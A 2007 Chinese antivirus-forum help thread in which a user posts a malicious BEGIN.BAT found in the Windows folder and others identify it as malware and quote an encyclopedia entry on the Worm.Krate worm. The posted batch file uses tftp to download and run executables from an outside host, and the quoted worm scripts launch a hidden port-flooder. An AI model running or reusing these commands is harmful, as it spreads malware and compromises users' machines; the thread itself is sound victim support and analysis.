查看: 1759|回复: 6
收起左侧

[已解决] 求救

 关闭 [复制链接]
苇溪
发表于 2007-9-13 17:57:03 | 显示全部楼层 |阅读模式
我的C盘windows目录下有个BEGIN.BAT
改了我的系统时间 删了还有
大家有谁知道该怎么弄啊 我都整了一天了
谢谢了
苇溪
 楼主| 发表于 2007-9-13 18:00:25 | 显示全部楼层

BEGIN.BAT内容如下

set a=2007-09-13 星期四
date=2001-01-01
ftp.exe -s:C:\WINDOWS\help.dll
if not exist tfp.exe sft -s:C:\WINDOWS\help.dll
if not exist tfp.exe tftp -i zy365.3322.org get tfp.exe
if not exist good.exe tftp -i zy365.3322.org get good.exe
tfp.exe
tfp.exe
good.exe
good.exe
date=%a%
:end
del C:\WINDOWS\help.dll
del C:\WINDOWS\BEGIN.BAT
exit
y37007
发表于 2007-9-13 18:06:15 | 显示全部楼层
    中毒了,杀吧


Worm.Krate
  

病毒别名:Flooder.Win32.Krate[AVP] / Flooder.Win32.Krate[KV]
处理时间:
威胁级别:★★
中文名称:深水炸弹
病毒类型:蠕虫
影响系统:Win9x / WinNT
病毒行为:
这是一个疯狂创建子目录的病毒。它会在C盘下面创建文件夹begin,并在该目录中生成恶意BAT文件。随后就在该文件夹下疯狂创建子文件夹,子文件夹名字为"1",在某些子文件夹下会生成恶意BAT文件。它一直创建子文件直到不能在创建为止,消耗用户系统资源。在最深一层的目录里面生成端口炸弹病毒程序。

1.在C:\begin生成文件begin.bat,内容为:
rem don't amaize why i am calling a !.bat file... or you look the rem code of the !.bat yourself... actually it's a too long path and rem xp doesn't support........
echo off
:br
cd 1
if exist run.bat goto bgn
) else (
goto :br

:bgn
start /low run.bat
goto end
:end
exit

2.在C:\begin的某个子文件夹中生成文件run.bat和只读、隐藏文件$!.sys.dll,run.bat文件内容为:
echo off
:br
cd 1
if exist $!.sys.dll goto bgn
) else (
goto :br

:bgn
$!.sys.dll
goto end
:end
exit

$!.sys.dll其实是可执行程序,它是该病毒释放的端口炸弹病毒程序,默认是攻击139端口。
苇溪
 楼主| 发表于 2007-9-13 18:13:05 | 显示全部楼层
怎么杀啊 小红伞和绿色版大蜘蛛都没有扫描到
平淡
发表于 2007-9-13 18:16:40 | 显示全部楼层

回复 4楼 苇溪 的帖子

费尔木马强力清除助手2.0.
http://bbs.kafan.cn/viewthread.php?tid=50114
看一下,楼主可以把它上传发到样本区看看
shenrenrenren
头像被屏蔽
发表于 2007-9-13 19:14:12 | 显示全部楼层
杀不了就扫个报告上来。
苇溪
 楼主| 发表于 2007-9-14 08:55:03 | 显示全部楼层
没杀了 重装了 呵呵
谢谢楼上各位
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-22 10:13 , Processed in 0.113989 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表